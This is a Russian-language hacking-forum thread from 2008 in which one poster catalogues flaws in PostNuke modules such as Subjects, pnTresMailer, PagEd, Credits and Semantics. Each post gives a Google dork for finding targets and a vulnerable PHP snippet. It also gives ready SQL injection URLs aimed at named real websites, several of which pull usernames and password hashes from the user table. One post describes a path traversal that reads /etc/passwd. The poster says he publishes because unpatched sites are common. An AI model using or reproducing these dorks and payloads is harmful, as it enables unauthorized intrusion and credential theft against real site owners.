Уязвимости модулей PostNuke |
16.12.2008, 00:38
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Уязвимости модулей PostNuke
PostNuke. Модуль:Subjects SQL
Уязвимый продукт: Модуль:Subjects Функция: printpage
Версия: <=1.5
Дорк: "inurl:module=subjects"
Уязвимый кусок кода:
PHP код:
$result = $dbconn->Execute("SELECT $column[pageid], $column[parentpageid],
$column[subid], $subcolumn[subname], $column[pagetitle],
$column[pagecontent], $column[pagefile],
$column[pageauthor], $column[pageauthoremail], $column[pageauthorurl],
$column[pagedatetime], $column[pagecounter]
FROM $pntable[subpages], $pntable[subjects]
WHERE $column[pageid]=$pageid AND
$column[subid]=$subcolumn[subid]");
Я бы хотел написать, что из кода видно. что уязвимый параметр pageid, но это конечно не так .
Из этого кода нифига не видно. если вы до этого не сталкивались с этим движком, так что придётся Вам поверить мне на слово 
Пример уязвимости:
http://rentflat.ru/index.php?module=subjects&func=printpage&pageid=-3+union+select+1,2,3,4,concat(pn_uname,0x3a,pn_pas s,0x3a,pn_email),6,7,8,9,0,11,12,13+from+nuke_user s+limit+1,1/*
Примечание: В данный момент существует версия этого модуля 2.01, в которой эта бага исправлена, но публикую её т.к. модуль достаточно популярен, и мне не встречались сайты с исправленной версией. в основном стоит эта.
|
|
|
16.12.2008, 00:39
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
PostNuke. Модуль:FormExpress Blind-SQL
Уязвимый продукт: Модуль:FormExpress
Версия: 0.3.5
Дорк: "inurl:module=FormExpress"
Уязвимый кусок кода:
PHP код:
$sql = 'SELECT '.$this->FormExpressCache_column['form_data']
.' FROM '.$this->FormExpressCache
.' WHERE '.$this->FormExpressCache_column['form_id'].' = '
. pnVarPrepForStore($form_id);
Уязвимый параметр form_id
Пример уязвимости:
http://www.westlakehomeinspections.com/index.php?module=FormExpress&func=display_form&for m_id=1*if(substring(version(),1,1)=5,1,2)
|
|
|
|
16.12.2008, 18:55
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
PostNuke. Модуль: pnTresMailer SQL
Уязвимый продукт: Модуль: pnTresMailer
Версия: 6.2 Проверял так-же на 6.03 и 6.1 Уязвимость присутствует
Дорк: "inurl:module=pnTresMailer"
Условие: "magic_quotes-off"
Уязвимый кусок кода:
PHP код:
$sql = "SELECT arch_message FROM $prefix"._nl_archive." WHERE arch_mid = '$arch_mid'";
Уязвимый параметр arch_mid
Эксплоит:
index.php?op=modload&name=pnTresMailer&file=index& req=PreviewArchive&arch_mid=-1'+union+select+concat_ws(0x3a,User(),Database(),V ersion())/*
Пример уязвимости:
http://www.owa.sjp-darmstadt.de/index.php?op=modload&name=pnTresMailer&file=index& req=PreviewArchive&arch_mid=-1'+union+select+concat_ws(0x3a,User(),Database(),V ersion())/*
Последний раз редактировалось jokester; 20.12.2008 в 13:47..
|
|
|
|
16.12.2008, 20:02
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
PostNuke. Модуль: PagEd SQL
Уязвимый продукт: Модуль: PagEd(он-же paged)
Версия: 0.9
Дорк: "inurl:module=paged"
Условие: "нет"
Код приводить считаю не целесообразным т.к. фильтрация отсутствует совсем, уязвимых параметров куча
Эксплоит: (примеры)
index.php?module=paged&topic_id=4&topictoview=3+un ion+select+1,concat_ws(0x3a,User(),Database(),Vers ion()),3,4/*
index.php?module=paged&page_id=888+union+select+co ncat_ws(0x3a,User(),Database(),Version()),2,3,4/*
index.php?module=paged&file=index&topic_id=1&page_ id=444+union+select+concat_ws(0x3a,User(),Database (),Version()),2,3,4/*
Примеры уязвимости:
http://www.owa.sjp-darmstadt.de/index.php?module=paged&topic_id=4&topictoview=3+un ion+select+1,concat_ws(0x3a,User(),Database(),Vers ion()),3,4/*
http://www.owa.sjp-darmstadt.de/index.php?module=paged&page_id=888+union+select+co ncat_ws(0x3a,User(),Database(),Version()),2,3,4/*
http://www.owa.sjp-darmstadt.de/index.php?module=paged&file=index&topic_id=1&page_ id=444+union+select+concat_ws(0x3a,User(),Database (),Version()),2,3,4/*
Последний раз редактировалось jokester; 16.12.2008 в 20:04..
|
|
|
|
16.12.2008, 21:00
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
PostNuke. Модуль: ProdReviews SQL
Уязвимый продукт: Модуль: ProdReviews
Версия: 0.42
Дорк: "inurl:module=ProdReviews"
Условие: "нет"
Уязвимый кусок кода:
PHP код:
function showcontent()
...
$query = "SELECT * FROM $pntable[prodreviews] WHERE $column[id]=".pnVarPrepForStore($id)."";
Уязвимый параметр id
Эксплоит:
index.php?module=ProdReviews&func=showcontent&id=-4+union+select+1,2,3,concat_ws(0x3a,User(),Databas e(),Version()),5,6,7,8,9,0,11,12,13,14,15/*
Пример уязвимости:
http://www.gesundheit.malzminden.de/index.php?module=ProdReviews&func=showcontent&id=-4+union+select+1,2,3,concat_ws(0x3a,User(),Databas e(),Version()),5,6,7,8,9,0,11,12,13,14,15/*
|
|
|
|
18.12.2008, 00:22
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
PostNuke. Модуль: concert SQL
Уязвимый продукт: Модуль: concert
Версия: 0.4
Дорк: "inurl:module=concert"
Условие: "нет"
Уязвимый кусок кода:
PHP код:
$sql = "SELECT *
FROM $concerttable
WHERE $concertcolumn[dc_id] = " . pnVarPrepForStore($dc_id);
Уязвимый параметр dc_id
Пример уязвимости:
http://www.palimpsest.com.au/index.php?module=concert&func=display&dc_id=-001+union+select+1,concat_ws(0x3a,User(),Database( ),Version()),3,44,5,6,7,8,9,0,11,12,13,14,15,16,17 ,18,19,20,21
|
|
|
|
18.12.2008, 02:16
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
PostNuke. Модуль: Credits Чтение произвольных файлов(Это стандартный модуль)
Уязвимый продукт: Модуль: Credits
Версия: 1.1
Дорк: "inurl:module=Credits"
Условие: "нет"
Код к сожалению показать не могу, просто не нашёл его т.к. версия не самая новая, а в версии 1.2 этого бага нет, но описания этой баги нигде не увидел, модуль стандартный версия такая попадается часто, поэтому выкладываю.
Итак переходим по ссылке
http://site.com/index.php?module=Credits
Сдесь показаны все модули и их версии, сразу можно посмотреть версию нашего модуля "Credits", если она нас устраивает нажимаем на просмотр лицензии, или чего там можно посмотреть на любом доступном для этого модуле в разделе "Documentation"
Перехватываем пакет Смотрим:
Credits version 1.1
Credits 1.1
authid=536b87a20a8b57bb257834817225ceba
crdirectory=Credits
crpath=docs/license.txt
heading=License
displayname=Credits
version=1.1
submit.x=9
submit.y=5
Думаю тут всё понятно, нам нужно например etc/passwd тогда меняем:
crdirectory=../../../../../../../../../../../../
crpath=/etc/passwd
И наслаждаемся
Пример уязвимости:
http://www.obernet.org/index.php?module=Credits&func=display Можете попробовать сдесь
|
|
|
|
19.12.2008, 00:33
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
PostNuke. Модуль: phPro(Девичья фамилия: phProfession) SQL
Уязвимый продукт: Модуль: phPro(phProfession)
Версия: 3.0
Дорк: "inurl:module=phPro"
Условие: "нет"
Уязвимый кусок кода:
PHP код:
$sql = "SELECT $joblistingcolumn[vacancy],
$joblistingcolumn[jid],
$jobdepartmentcolumn[department],
$jobdepartmentcolumn[id],
$joblocationcolumn[location],
$joblocationcolumn[id],
$jobsalarycolumn[salary],
$jobsalarycolumn[id],
$joblistingcolumn[responsibilities],
$joblistingcolumn[qualifications],
$joblistingcolumn[cname],
$joblistingcolumn[cmail],
$joblistingcolumn[posted],
$joblistingcolumn[hits],
$joblistingcolumn[fk_pn_uid],
$joblistingcolumn[fk_expper_id],
$joblistingcolumn[expirytime],
$joblistingcolumn[active]
FROM $joblistingtable,
$jobdepartmenttable,
$joblocationtable,
$jobsalarytable
WHERE $jobdepartmentcolumn[id] = $joblistingcolumn[fk_department]
AND $joblocationcolumn[id] = $joblistingcolumn[fk_location]
AND $jobsalarycolumn[id] = $joblistingcolumn[fk_salary]
AND $joblistingcolumn[jid] = " . pnVarPrepForStore($jid);
Уязвимый параметр jid
История с этим модулем такая, там откуда я его сливал в папке "phprofession" лежали два архива: "phPro_v3.0alpha" и "phprofession2.5.4" код выше из "phPro" , а в "phprofession" в коде даже параметра такого нет, ставить я его не стал(версия старая), а вот в гугле глянул. Оказалось что запись "module=phProfession" в урле можно запросто изменить на "module=phPro" и всё будет нормольно. а вот наоборот нет. Тоесть совместимость вроде должна быть у новой версии со старой, а тут наоборот (разбираться с этой байдой не стал, т.к к делу отношения не имеет.Кому хочется привожу оба линка).
Примеры уязвимости:
http://www.hillelsaroundchicago.org/index.php?module=phPro&func=display&jid=-57+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0
http://www.arundellodge.org/index.php?module=phProfession&func=display&jid=-57+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0
|
|
|
|
20.12.2008, 14:10
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
PostNuke. Модуль: Semantics SQL
Уязвимый продукт: Модуль: Semantics
Версия: .71
Дорк: "inurl:module=Semantics"
Условие: "нет"
Уязвимый кусок кода:
PHP код:
$sql = "SELECT $semanticscolumn[category],
$semanticscolumn[description]
FROM $semanticstable
WHERE $semanticscolumn[cid] = $cid";
Уязвимый параметр cid
Пример уязвимости:
http://www.astrobio.net/news/index.php?module=Semantics&func=display&cid=-1+union+select+concat_ws(0x3a,User(),Database(),Ve rsion()),2
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
